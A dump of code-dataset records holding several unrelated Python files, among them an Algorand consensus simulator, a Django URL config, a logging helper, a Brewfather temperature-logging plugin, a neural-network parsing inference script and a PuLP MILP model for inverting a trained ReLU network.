_message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_BLOCK_PROPOSAL', rcv_node, _message))\n\n elif _type == 'CAST_VOTE':\n des.remove_event('RECEIVE_BLOCK_PROPOSAL', current_time)\n node.step += 1\n _message = node.committee_vote(node.round, node.step, t_step)\n _t = current_time + 3000\n des.add_event(Event(_t, 'COUNT_VOTES', node))\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_VOTE_MESSAGE', rcv_node, _message))\n\n elif _type == 'RECEIVE_VOTE_MESSAGE':\n _message = node.receive_vote(ev.message)\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_VOTE_MESSAGE', rcv_node, _message))\n\n elif _type == 'COUNT_VOTES':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n node.r, TIMEOUT = node.count_vote(t_step)\n\n if node.step < 2:\n des.add_event(Event(current_time, 'CAST_VOTE', node))\n else:\n node.block_hash = node.r\n des.add_event(Event(current_time, 'BINARY_BA*', node))\n\n elif _type == 'BINARY_BA*':\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n 
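The Algorand simulation in the record above drives everything through `Event` and `EventSimulator` objects imported from `event_simulator`, whose implementation is not included in this dump. A minimal sketch of such a time-ordered scheduler, with the interface only inferred from the call sites (`add_event`, `get_next_event`, and `remove_event(type, timestamp)`) and therefore an assumption rather than the project's actual code, could look like this:

```python
import heapq
import itertools


class Event:
    """A scheduled simulation event (fields assumed from the call sites above)."""
    def __init__(self, timestamp, type, node=None, message=None):
        self.timestamp = timestamp
        self.type = type
        self.node = node
        self.message = message


class EventSimulator:
    """Minimal discrete-event queue backed by a binary heap."""
    def __init__(self):
        self._heap = []
        self._counter = itertools.count()  # tie-breaker for equal timestamps

    def add_event(self, event):
        # the counter keeps heap entries comparable even when timestamps collide
        heapq.heappush(self._heap, (event.timestamp, next(self._counter), event))

    def get_next_event(self):
        # return the earliest pending event, or None when the queue is empty
        if not self._heap:
            return None
        return heapq.heappop(self._heap)[2]

    def remove_event(self, type, before):
        # drop all pending events of the given type scheduled up to `before`
        self._heap = [(t, c, e) for (t, c, e) in self._heap
                      if not (e.type == type and t <= before)]
        heapq.heapify(self._heap)
```

The heap keeps `get_next_event` logarithmic in the number of pending events; the insertion counter avoids ever comparing two `Event` objects directly, which would otherwise raise a `TypeError` when timestamps are equal.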
elif _type == 'CAST_VOTE_BA*':\n _t = current_time + 3000\n if node.s_dash is None:\n node.step += 1\n _message = node.committee_vote(node.round, node.step, t_step)\n des.add_event(Event(_t, 'COUNT_VOTES_BA*', node))\n\n elif node.s_dash > node.step + 3 and node.step == node.s_final:\n node.s_dash = None\n _message = node.committee_vote(\n node.round, node.s_final, t_final)\n node.block_hash = node.r\n _t = current_time + 3000\n des.add_event(Event(_t, 'FINAL_COUNT_VOTES', node))\n else:\n des.add_event(Event(_t, 'BA*_LOOP', node))\n _message = node.committee_vote(node.round, node.s_dash, t_step)\n\n if _message is not None:\n for rcv_node in node.neighbors:\n _t = current_time + node.non_block_msg_delay\n des.add_event(\n Event(_t, 'RECEIVE_VOTE_MESSAGE', rcv_node, _message))\n\n elif _type == 'COUNT_VOTES_BA*':\n node.r, TIMEOUT = node.count_vote(t_step)\n case = (node.step - 3) % 3\n if case == 0:\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.r != b'Empty' and not TIMEOUT:\n des.add_event(Event(current_time, 'BA*_LOOP', node))\n else:\n if TIMEOUT:\n node.r = node.block_hash\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n if case == 1:\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if not TIMEOUT and node.r == b'Empty':\n des.add_event(Event(current_time, 'BA*_LOOP', node))\n else:\n if TIMEOUT:\n node.r = b'Empty'\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n if case == 2:\n if TIMEOUT:\n _t = current_time + 3000\n des.add_event(Event(_t, 'COMMON_COIN', node))\n else:\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.step + 1 < MAX_STEPS:\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n elif _type == 'COMMON_COIN':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.common_coin(node.round, node.step) == 0:\n node.r = node.block_hash\n else:\n node.r = b'Empty'\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n\n elif _type == 'BA*_LOOP':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n if node.s_dash is None:\n node.s_dash = node.step + 1\n else:\n node.s_dash += 1\n\n if node.s_dash <= node.step + 3 or node.step == node.s_final:\n des.add_event(Event(current_time, 'CAST_VOTE_BA*', node))\n else:\n node.block_hash = node.r\n des.add_event(Event(current_time, 'FINAL_COUNT_VOTES', node))\n node.s_dash = None\n\n elif _type == 'FINAL_COUNT_VOTES':\n des.remove_event('RECEIVE_VOTE_MESSAGE', current_time)\n node.r, TIMEOUT = node.count_vote(t_final)\n if node.r == node.block_hash:\n final_block_count += 1\n print(\"Node: {} Final block found\".format(node.id))\n else:\n print(\"Node: {} Tentative block found\".format(node.id))\n \n if final_block_count >= net.num_nodes:\n message = node.proposed_block[0][0].payload\n message = b' || '.join([message.split(b' || ')[0], node.block_hash])\n des.add_event(\n Event(current_time, 'ADD_BLOCK',message=message))\n\n elif _type == 'ADD_BLOCK':\n net.blockchain.add_block(ev.message)\n print(\"Consensus reached on block:\")\n print(ev.message)\n _round += 1\n final_block_count = 0\n if _round >= config.blocks:\n break\n\n for _n in net.node_list:\n _n.reset(_round)\n des.add_event(Event(current_time, 'PRIORITY_MESSAGE', _n))\n\n ev = des.get_next_event()\n \n if config.exp1:\n net.print_stack_sortion_stats()\n \n print(net.blockchain)\n\n\ndef main(config):\n\n net = Network(config.node)\n des = EventSimulator()\n\n # Creating initial events\n # PRIORITY_MESSAGE event\n for node in net.node_list:\n des.add_event(Event(0, 
'PRIORITY_MESSAGE', node))\n\n    # Main simulation loop\n    simulation(des, net, config)\n\n\nif __name__ == \"__main__\":\n    main(get_config())\n    # Initialise all nodes and neighbors\n","sub_path":"Algorand/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"585228409","text":"from django.conf.urls import url\nfrom location.views import LocationTemplateView, FloorTemplateView\n\nurlpatterns = [\n    url(\n        regex=r'^$',\n        view=LocationTemplateView.as_view(),\n        name='location',\n    ),\n    url(\n        regex=r'^building/(?P<building>\d{1,10})/floor/(?P<floor>\d{1,10})$',\n        view=FloorTemplateView.as_view(),\n        name='floor',\n    ),\n]\n","sub_path":"location/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"122022130","text":"#encoding:utf-8\n\"\"\"\nSystem runtime logging class\n\"\"\"\n\nimport os\nimport sys\nimport logging\nfrom logging import handlers\n\nreload(sys)\nsys.setdefaultencoding('utf-8')\nsys.path.append('../')\n\n\nclass Logger(object):\n    \"\"\"Manage the program's runtime logs\"\"\"\n    # mapping from level names to logging levels\n    level_relations = {\n        'debug': logging.DEBUG,\n        'info': logging.INFO,\n        'warning': logging.WARNING,\n        'error': logging.ERROR,\n        'crit': logging.CRITICAL\n    }\n\n    file_name = os.path.basename(sys.argv[0])\n    file_name = '.'.join(file_name.split('.')[:-1])+'.log'  # default log file name: the running script's name\n\n    def __init__(self, filename=file_name, file_path='.', level='info', interval=1, when='D', backup_count = 10,\\\n                 fmt='%(asctime)s - %(pathname)s[line:%(lineno)d] - %(levelname)s: %(message)s', show_terminal=False):\n        \"\"\" Initialize the logging class\n        # the default log file name is the running script's name plus .log, unless one is given\n        # the default save path is the current working directory\n        By default the level is info, logs rotate every 1 unit of time (days by default), and about half a month of backups is kept\n        show_terminal: whether to also print to the terminal, off by default\n        \"\"\"\n        filename = os.path.join(file_path, filename)\n        self.logger = logging.getLogger(filename)\n        format_str = logging.Formatter(fmt)  # set the log message format\n        self.logger.setLevel(self.level_relations.get(level))  # set the log level\n        th = handlers.TimedRotatingFileHandler(filename=filename, interval=interval, when=when,\n                                               backupCount=backup_count)\n        th.setFormatter(format_str)  # set the format written to the file\n        self.logger.addHandler(th)\n        if show_terminal:\n            sh = logging.StreamHandler()  # also output to the screen\n            sh.setFormatter(format_str)  # set the format shown on the screen\n            self.logger.addHandler(sh)  # attach the handler to the logger\n\n\n\nif __name__ == '__main__':\n    # log = Logger('all.log',level='debug')\n    import time\n    log = Logger(show_terminal=True,level='debug')\n    domain = \"baidu.com\"\n    log.logger.debug('debug%s' % domain)\n    log.logger.info('info')\n    log.logger.warning('warning')\n    log.logger.error('error')\n    log.logger.warning('warning')\n    #\n    # log.logger.critical('critical')\n    # Logger('error.log', level='error').logger.error('error')","sub_path":"respond_server/Logger.py","file_name":"Logger.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"267098181","text":"from modules import cbpi\nimport requests\n\nbf_uri = \"http://log.brewfather.net/stream\"\n\ndef bf_stream_id():\n    api_id = cbpi.get_config_parameter(\"brewfather_stream_id\", None)\n    if api_id is None:\n        try:\n            cbpi.add_config_parameter(\"brewfather_stream_id\", \"\", \"text\", \"Brewfather stream API ID\")\n            return \"\"\n        except:\n            cbpi.notify(\"Brewfather Error\", \"Unable to update brewfather_stream_id parameter within database. Try updating CraftBeerPi and reboot.
Try updating CraftBeerPi and reboot.\", type=\"danger\", timeout=None)\n else:\n return api_id\n\n\n@cbpi.backgroundtask(key=\"brewfather_fermtask\", interval=900)\ndef brewfather_background_fermtask(api):\n api_id = bf_stream_id()\n if api_id == \"\":\n cbpi.notify(\"Brewfather Error\", \"Stream ID not set. Update brewfather_stream_id parameter within System > Parameters.\", type=\"danger\", timeout=None)\n return\n\n for i, fermenter in cbpi.cache.get(\"fermenter\").iteritems():\n\n # if fermenter is active, we will log the temperatures\n if fermenter.state is not False:\n try:\n queryString = {\n \"id\": api_id\n }\n \n data = {\n \"name\": fermenter.name,\n \"beer\": fermenter.brewname,\n \"temp\": cbpi.get_sensor_value(fermenter.sensor), \n \"aux_temp\": cbpi.get_sensor_value(fermenter.sensor2), \n \"ext_temp\": cbpi.get_sensor_value(fermenter.sensor3), \n \"temp_unit\": cbpi.get_config_parameter(\"unit\", \"C\")\n }\n\n response = requests.post(bf_uri, params=queryString, json=data)\n\n if response.status_code != 200:\n cbpi.notify(\"Brewfather Error\", \"Received unsuccessful response. Ensure API Id is correct. HTTP Error Code: \" + str(response.status_code), type=\"danger\", timeout=None)\n\n except BaseException as error:\n cbpi.notify(\"Brewfather Error\", \"Unable to send message.\" + str(error), type=\"danger\", timeout=None)\n pass\n","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"514772218","text":"import os\nimport tensorflow as tf\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"3\"\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsession = tf.Session(config=config)\nimport sys\n\nsys.path.insert(0, os.getcwd())\nimport skimage.io\n\nfrom configs.vip import ParsingRCNNModelConfig\n\nfrom models.parsing_rcnn_model import PARSING_RCNN\nfrom utils import visualize\nfrom time import time\n\nt0 = time()\n# Root directory of the project\nROOT_DIR = os.getcwd()\n\n# Directory to save logs and trained model\nMODEL_DIR = os.path.join(ROOT_DIR, \"outputs\")\n\n# Path to trained weights file\n# Download this file and place in the root of your \n# project (See README file for details)\nDATASET_DIR = \"/home/sk49/workspace/dataset/VIP\"\nMODEL_PATH = \"./outputs/vip_singleframe_20181229a/checkpoints/parsing_rcnn_vip_singleframe_20181229a_epoch040.h5\"\n# MODEL_PATH = \"./outputs/vip_singleframe_20181229ma/checkpoints/parsing_rcnn_vip_singleframe_20181229ma_epoch080.h5\"\n# MODEL_PATH = \"./checkpoints/parsing_rcnn.h5\"\n# Directory of images to run detection on\nIMAGE_DIR = DATASET_DIR + \"/Images\"\nIMAGE_LIST = DATASET_DIR + \"/lists/val_id.txt\"\n\nRES_DIR = \"./vis/val_vip_singleframe_20181229a_epoch040\"\n# RES_DIR = \"./vis/val_vip_singleframe\"\nif not os.path.exists(RES_DIR):\n os.makedirs(RES_DIR)\n\n\nclass InferenceConfig(ParsingRCNNModelConfig):\n # Set batch size to 1 since we'll be running inference on\n # one image at a time. 
Batch size = GPU_COUNT * IMAGES_PER_GPU\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n\nconfig = InferenceConfig()\nconfig.display()\n\n# Create model object in inference mode.\nmodel = PARSING_RCNN(mode=\"inference\", config=config, model_dir=MODEL_DIR)\n\n# Load weights trained on MS-COCO\nmodel.load_weights(MODEL_PATH, by_name=True)\nprint(\"load model\", time() - t0, \"s\")\nc = 0\nrfp = open(IMAGE_LIST, 'r')\nfor line in rfp.readlines():\n line = line.strip()\n c += 1\n print(c, line)\n ind = line.find('/')\n vid = line[:ind]\n image_id = line[ind + 1:]\n video_floder = os.path.join(RES_DIR, vid)\n if not os.path.exists(video_floder):\n os.makedirs(video_floder)\n if os.path.exists(os.path.join(video_floder, 'instance_part', image_id) + '.png'):\n continue\n image = skimage.io.imread(os.path.join(IMAGE_DIR, vid, image_id) + '.jpg')\n # Run detection\n t1 = time()\n results = model.detect([image])\n t2 = time()\n print(\"test one image\", t2 - t1, \"s\")\n\n # Visualize results\n r = results[0]\n visualize.vis_insts(image, video_floder, image_id, r['rois'], r['masks'], r['class_ids'], r['scores'])\n visualize.write_inst_part_result(video_floder, image.shape[0], image.shape[1], image_id, r['rois'], r['masks'],\n r['scores'], r['global_parsing'])\n print(\"visualize results\", time() - t2, \"s\")\n\nprint(\"total\", time() - t0, \"s\")\n","sub_path":"val_parsingrcnn.py","file_name":"val_parsingrcnn.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"15588705","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom tf_layers import BatchNormLayer, ConvLayer, ActivationLayer\n\ndef init_filter(d,mi,mo,stride):\n\treturn (np.random.randn(d,d,mi,mo) * np.sqrt(2.0 / (d * d * mi))).astype(np.float32)\n\nclass ConvBlock:\n\n\tdef __init__(self,f_in,fm_sizes,stride=1,d=3,activation=None):\n\t\tassert(len(fm_sizes) == 3)\n\n\t\tif activation is None:\n\t\t\tself.activation = ActivationLayer()\n\t\telse:\n\t\t\tself.activation = activation\n\t\t#main brach\n\t\t#conv->bn->f()--->conv->bn->f()--->conv-->bn\n\t\tself.conv1 = ConvLayer(d,f_in,fm_sizes[0],stride)\n\t\tself.bn1=BatchNormLayer(fm_sizes[0])\n\t\tself.conv2 = ConvLayer(d,fm_sizes[0],fm_sizes[1],stride)\n\t\tself.bn2=BatchNormLayer(fm_sizes[1])\n\t\tself.conv3=ConvLayer(d,fm_sizes[1],fm_sizes[2],stride)\n\t\tself.bn3=BatchNormLayer(fm_sizes[2])\t\t\t\n\n\t\t#skip\n\t\t#Conv-->BN\n\t\tself.convs=ConvLayer(d,f_in,fm_sizes[2],stride)\n\t\tself.bns=BatchNormLayer(fm_sizes[2])\n\n\t\tself.layers = [\n\t\t\tself.conv1,self.bn1, self.activation,\n\t\t\tself.conv2, self.bn2, self.activation,\n\t\t\tself.conv3, self.bn3,\n\t\t\tself.convs, self.bns,\n\t\t]\n\n\tdef forward(self,X,isTrain=True):\n\t\t#main br\n\t\tFX = X\n\t\tfor layer in self.layers[:-2]:\n\t\t\tFX = layer.forward(FX,isTrain)\n\n\t\t#skip\n\t\tSX = self.layers[-2].forward(X=X,isTrain=isTrain)\n\t\tSX = self.layers[-1].forward(X=SX,isTrain=isTrain)\n\n\t\treturn FX + SX\n\n\tdef copyFromKerasLayers(self,layers):\n\t\tself.conv1.copyFromKerasLayers(layers[0])\n\t\tself.bn1.copyFromKerasLayers(layers[1])\n\n\t\tself.conv2.copyFromKerasLayers(layers[3])\n\t\tself.bn2.copyFromKerasLayers(layers[4])\n\n\t\tself.conv3.copyFromKerasLayers(layers[6])\n\t\tself.bn3.copyFromKerasLayers(layers[8])\n\n\t\tself.convs.copyFromKerasLayers(layers[7])\n\t\tself.bns.copyFromKerasLayers(layers[9])\n\n\tdef get_params(self):\n\t\tparams = []\n\t\tfor layer in 
self.layers:\n\t\t\tparams += layer.get_params()\n\t\treturn params\n\n","sub_path":"wolFikaM/tf_convBlock_resnet.py","file_name":"tf_convBlock_resnet.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"531039885","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nThis file implements\n - a class to store the architecture of a multilayer perceptron (ANN)\n - functions to initialize vatiables and build a pulp MILP model for\n inverting an ANN of a given architecture\n\nAuthor: Discrete Mathematics Lab,\n Department of Applied Mathematics and Physics,\n Graduate School of Informatics,\n Kyoto University\n\"\"\"\n\n# standard imports\nimport sys\nimport pandas as pd\nimport numpy as np\n\n# import pulp for MILP modeling\nimport pulp\n\n\nclass ANN:\n \"\"\"\n An encapsulating class to conveniently store\n information about a trained neural network\n \"\"\"\n\n def __init__(self, weight_tensor=list(), bias_matrix=list()):\n # prepare a list to store all the nodes\n self.nodes = list()\n # prepare a list to store sets of nodes by layer\n self.layers = list()\n # a dictionary to bind pairs of vertices to weights\n self.weights = dict()\n # a dictionary to bind each vertex to a bias\n self.biases = dict()\n # a dictionary to store a list of the in neighbors\n # for each vertex not in the input layer\n self.in_neighbors = dict()\n\n for l, bias_layer in enumerate(bias_matrix):\n layer_nodes = list()\n for k, bias in enumerate(bias_layer):\n node = (l+1, k+1)\n self.nodes.append(node)\n self.biases[node] = bias\n layer_nodes.append(node)\n self.layers.append(layer_nodes)\n\n \"\"\"\n Store the nodes in lists by layer\n \"\"\"\n for l, layer in enumerate(self.layers):\n try:\n for node in self.layers[l+1]:\n self.in_neighbors[node] = layer\n except IndexError:\n # We are at the last layer that\n # does not have a succeeding layer\n pass\n except ValueError:\n # This should not happen\n print(\"\"\"\n Received Value Error\n in distributing ANN nodes by layers\n \"\"\")\n sys.exit()\n\n \"\"\"\n Store the weights as a dictionary\n of ordered node pairs\n \"\"\"\n for l, weight_matrix in enumerate(weight_tensor):\n for i, weight_row in enumerate(weight_matrix):\n for j, weight in enumerate(weight_row):\n # source node in current layer\n u = (l+1, i+1) # mind the +1 offset in naming\n # target node in next layer\n v = (l+2, j+1)\n self.weights[(u, v)] = weight\n\n def activation(self, x, func=None):\n \"\"\"\n Define an activation function for the ANN\n If no particular function is supplied, then\n ReLU is used by default\n \"\"\"\n if func:\n # This means that some activation function was supplied\n return func(x)\n else:\n # Otherwise, we use ReLU\n return max(0, x)\n\n @property\n def input_layer(self):\n \"\"\"\n Simply return the first layer\n \"\"\"\n return self.layers[0]\n\n @property\n def output_layer(self):\n \"\"\"\n Return the last layer\n \"\"\"\n return self.layers[-1]\n\n @property\n def hidden_layers(self):\n \"\"\"\n Return an iterator of the internal layers,\n i.e. 
Layers other than index 0 and -1\n \"\"\"\n for l in self.layers[1:-1]:\n yield l\n\n @property\n def non_input_nodes(self):\n \"\"\"\n Return a generator of all the nodes in all\n layers except the first one\n \"\"\"\n for layer in self.layers[1:]:\n for node in layer:\n yield node\n\n def propagate(self, fv):\n \"\"\"\n Predict using trained model\n\n Arguments:\n fv {array_like} -- feature vector (input layer)\n Returns:\n pred_val {scalar object} -- predicted value (output layer)\n\n NOTE\n input layer:\n y[0] = fv\n\n hidden layer and output layer:\n x[i+1] = dot(w[i+1], y[i]) + b[i+1]\n y[i+1] = activation(x[i+1])\n i = 1, 2, ..., num_layer - 1\n \"\"\"\n\n # list of nodes in current layer\n cur_layer = self.input_layer\n\n # vector in current layer {numpy.ndarray}\n vec_y = np.array(fv)\n\n for next_layer in self.layers[1:]:\n # prepare weight matrix {numpy.ndarray}\n weight_matrix = np.array([\n [self.weights[(u, v)] for u in cur_layer]\n for v in next_layer\n ])\n\n # prepare bias vector {numpy.ndarray}\n bias_vector = np.array([\n self.biases[v]\n for v in next_layer\n ])\n \n vec_x = np.dot(weight_matrix, vec_y) + bias_vector\n \n if next_layer == self.output_layer:\n vec_y = np.array([x for x in vec_x])\n else:\n vec_y = np.array([\n self.activation(x)\n for x in vec_x\n ])\n \n # update current layer\n cur_layer = next_layer\n\n return list(vec_y)\n\n\ndef initialize_constants(ann, training_data):\n \"\"\"\n Given a trained ANN and a matrix of training data\n where each row is a single sample,\n calculate the ranges of values that can be passed\n to each node in the ANN\n \"\"\"\n\n # cast the training data as a numpy array\n td = np.array(training_data)\n # Check if the training_data's feature vectors have exactly the same\n # number of elements as nodes in the input layer\n if td.shape[1] != len(ann.input_layer):\n print(\"###############\")\n print(\"\"\"\n Vector length mismatch between training data\n and ANN input layer!\n \"\"\")\n sys.exit()\n # prepare dictionaries to store values\n a_low = dict()\n a_high = dict()\n a = dict()\n b_low = dict()\n b_high = dict()\n b_hat = dict()\n b = dict()\n c = dict()\n z13 = dict()\n # first, calculate b_low, b_high values for the\n # nodes of the input layer\n for node, column in zip(ann.input_layer, td.T):\n b_low[node] = min(column)\n b_high[node] = 1000\n b[node] = (b_low[node], 0, b_high[node])\n\n # calculate the ranges for the remaining layers\n for v in ann.non_input_nodes:\n a_low[v], a_high[v] = 0, 0\n for u in ann.in_neighbors[v]:\n w_uv = ann.weights[(u, v)]\n if w_uv > 0:\n a_low[v] += w_uv*b_low[u]\n a_high[v] += w_uv*b_high[u]\n else:\n a_high[v] += w_uv*b_low[u]\n a_low[v] += w_uv*b_high[u]\n # if ann.biases[v] >= 0:\n # a_high[v] += ann.biases[v]\n # else:\n # a_low[v] += ann.biases[v]\n a_high[v] += ann.biases[v]\n a_low[v] += ann.biases[v]\n\n # zip the a_low, a_high variables into a single triplet\n a[v] = (a_low[v], 0, a_high[v])\n\n b_low[v] = 0\n\n ##################\n if v in ann.output_layer:\n b_low[v] = -1000\n ##################\n\n if a_high[v] > 0:\n b_high[v] = a_high[v]\n else:\n b_high[v] = 0\n # zip the b_low, b_high variables into a single triplet\n b[v] = (b_low[v], 0, b_high[v])\n b_hat[v] = 2*a_high[v] - a_low[v]\n c[v] = (0, 1)\n z13[v] = (1, 0)\n\n # print(v, \" a_high[v] = \", a_high[v], \" a_low[v] = \", a_low[v])\n\n return a, b, b_hat, c, z13\n\n\ndef initialize_lp_variables(ann, a, b, forbidden_node, property_name=\"def\"):\n \"\"\"\n Given a trained ANN,\n initialize variables for each 
node.\n Dictionaries a and b give the ranges for the variables\n \"\"\"\n low = 0\n high = 2\n\n \"\"\"\n A dictionary to store x_v variable for each node v not in the input layer.\n x_v is real-valued and a[v][low] <= x_v <= a[v][high]\n \"\"\"\n x = {node: pulp.LpVariable(\"ann_x{}_{}\".format(node, property_name),\n a[node][low],\n a[node][high])\n for node in ann.non_input_nodes}\n\n \"\"\"\n A dictionary to store y_v variable for each node v in ann.\n y_v is real-valued and 0 <= y_v <= b[v][high]\n \"\"\"\n y = {node: pulp.LpVariable(\"ann_y{}_{}\".format(node, property_name),\n b[node][low],\n b[node][high])\n for node in ann.nodes if node not in forbidden_node}\n \"\"\"\n A dictionary to store binary z_v variable\n for each node v not in the input layer.\n \"\"\"\n z = {node: pulp.LpVariable(\"ann_z{}_{}\".format(node, property_name), 0, 1, pulp.LpBinary)\n for node in ann.non_input_nodes}\n\n return x, y, z\n\n\ndef build_MILP_ReLU(\n model : pulp.LpProblem,\n ann : ANN, \n variables: tuple, \n constants: tuple, \n target : tuple,\n eps : float,\n forbidden_node,\n property_name = \"def\" \n )-> pulp.LpProblem:\n \"\"\"\n Given matrices of variables and constants,\n construct an MILP model in PuLP according to the\n MILP formulation for ReLU activation functions,\n Akutsu and Nagamochi, 2019\n \"\"\"\n\n if type(target) == int or type(target) == float:\n target = [target, ]\n \"\"\"\n First, check if the last (output) layer of ann\n has the same size as the target data\n \"\"\"\n if len(ann.output_layer) != len(target):\n print(\"\"\"\n Error: The size of the output layer and the\n target data do not match!\n The program will now exit.\n \"\"\")\n sys.exit()\n\n x, y, z2 = variables # unzip the variables\n a, b, b_hat, c, z13 = constants # unzip the constants\n \"\"\"\n For convenience, zip the constants from z13 and variables from z2\n into a single structure\n \"\"\"\n z = dict()\n for node in ann.non_input_nodes:\n z[node] = (z13[node][0], z2[node], z13[node][1])\n\n # Constraint on the activation of ann\n for v in ann.non_input_nodes:\n in_u = ann.in_neighbors[v]\n w_v = [ann.weights[(u, v)] for u in in_u if u not in forbidden_node]\n in_y = [y[u] for u in in_u if u not in forbidden_node]\n\n model += \\\n x[v] == pulp.lpDot(in_y, w_v) + ann.biases[v], \\\n \"Output_node_{}_{}\".format(v, property_name)\n\n if v in ann.output_layer:\n model += y[v] == x[v], \"ReLU_y{}_{}\".format(v, property_name)\n else:\n ###################\n model += \\\n x[v] - a[v][1] <= (a[v][2] - a[v][0]) * z[v][1], \\\n \"ReLU_x{}_ub_{}\".format(v, property_name)\n\n if a[v][2] > 0:\n model += \\\n x[v] - a[v][1] >= (a[v][0] - a[v][2]) * (1 - z[v][1]), \\\n \"ReLU_x{}_lb_{}\".format(v, property_name)\n\n for i in [0, 1]:\n model += \\\n y[v] <= c[v][i] * (x[v] - a[v][i]) + b[v][i] \\\n + b_hat[v] * (1 + z[v][i + 1] - z[v][i]), \\\n \"ReLU_y{}_{}_ub_{}\".format(v, i, property_name)\n\n model += \\\n y[v] >= c[v][i] * (x[v] - a[v][i]) + b[v][i] \\\n - b_hat[v] * (1 + z[v][i + 1] - z[v][i]), \\\n \"ReLU_y{}_{}_lb_{}\".format(v, i, property_name)\n else:\n model += z[v][1] == 0, \"ReLU_x{}_lb_{}\".format(v, property_name)\n model += y[v] == 0, \"ReLU_y{}_{}\".format(v, property_name)\n\n #######################\n\n\n for out_node, tv in zip(ann.output_layer, target):\n #######################\n if tv >= 0:\n model += \\\n y[out_node] >= tv * (1 - eps), \\\n \"lower_bound_target_{}_{}\".format(out_node, property_name)\n\n model += \\\n y[out_node] <= tv * (1 + eps), \\\n 
\"upper_bound_target_{}_{}\".format(out_node, property_name)\n else:\n model += \\\n y[out_node] >= tv * (1 + eps), \\\n \"lower_bound_target_{}_{}\".format(out_node, property_name)\n\n model += \\\n y[out_node] <= tv * (1 - eps), \\\n \"upper_bound_target_{}_{}\".format(out_node, property_name)\n #######################\n\n # Finally, return the built model\n return model\n\n\ndef line2num(line, numtype=float, sep=\" \"):\n line = line.strip()\n return [numtype(num) for num in line.split(sep)]\n\n\ndef read_trained_ANN(weight_filename, bias_filename):\n \"\"\"\n Given filenames to files that\n contain the values for the weights and biases\n of a trained ANN, read the values form the files,\n contruct an ANN and return it\n \"\"\"\n try:\n with \\\n open(weight_filename, \"r\") as wf, \\\n open(bias_filename, \"r\") as bf:\n layer_sizes = line2num(wf.readline(), int)\n weight_tensor = list()\n for ell in layer_sizes[:-1]:\n weight_matrix = list()\n for _ in range(ell):\n weight_line = wf.readline()\n weight_matrix.append(line2num(weight_line))\n weight_tensor.append(weight_matrix)\n bias_matrix = list()\n \"\"\"\n The input layer has no bias, and\n we define it to be 0\n \"\"\"\n bias_matrix.append([0]*layer_sizes[0])\n for ell in layer_sizes[1:]:\n bias_row = list()\n for _ in range(ell):\n bias_line = bf.readline().strip()\n bias_row.append(float(bias_line))\n bias_matrix.append(bias_row)\n except:\n print(\n \"\"\"\n An error occured when trying to read ANN data from files\n {}\n {}\n Now will terminate\n \"\"\".format(weight_filename, bias_filename))\n sys.exit()\n\n return weight_tensor, bias_matrix\n\n\ndef read_fv_descriptors(training_data_filename):\n \"\"\"\n Read the textual names for the descriptors\n in the feature vector, as the first line from\n the supplied training data file.\n Return a list of these names as strings\n \"\"\"\n try:\n data_frame = pd.read_csv(training_data_filename, sep=\",\")\n except:\n print(\"\"\"\n Error reading the file {}\n with pandas.\n \"\"\".format(training_data_filename))\n sys.exit()\n return list(data_frame.columns)\n\n\ndef read_training_data(training_data_filename):\n \"\"\"\n Given a set of feature vectors as training data,\n return a matrix that contains one feature vector\n per row\n \"\"\"\n try:\n data_frame = pd.read_csv(training_data_filename, sep=\",\")\n except:\n print(\"\"\"\n Error reading the file {}\n with pandas.\n \"\"\".format(training_data_filename))\n sys.exit()\n # print(data_frame.values) # testing\n\n try:\n table = data_frame.values # numpy array\n table = table[:, 1:]\n except:\n print(\"\"\"\n Exception in converting the dataframe\n to a numpy array, file\n {}\n \"\"\".format(training_data_filename))\n sys.exit()\n # Success\n return table \n \ndef get_input_layer_variables(ann, variables, descriptors, forbidden_node):\n \"\"\"\n Given a list of descriptor names and a tuple of\n variables of the MILP_Relu model,\n create and return a dictionary that for each descriptor\n gives the corresponding variable\n \"\"\"\n # unpack the variables\n x, y, z = variables\n # Initialize an empty dictionary\n sol = dict()\n # Iterate over the input layer and the list of descriptors\n # at the same time\n for v, name in zip(ann.input_layer, descriptors):\n if v not in forbidden_node:\n sol[name] = y[v]\n return sol\n\n# Testing\ndef test():\n w, b = read_trained_ANN(\n \"../../test_files/fv4_Kow_weight_5.txt\", \n \"../../test_files/fv4_Kow_bias_5.txt\" )\n \n ann = ANN(w, b)\n # for key, val in 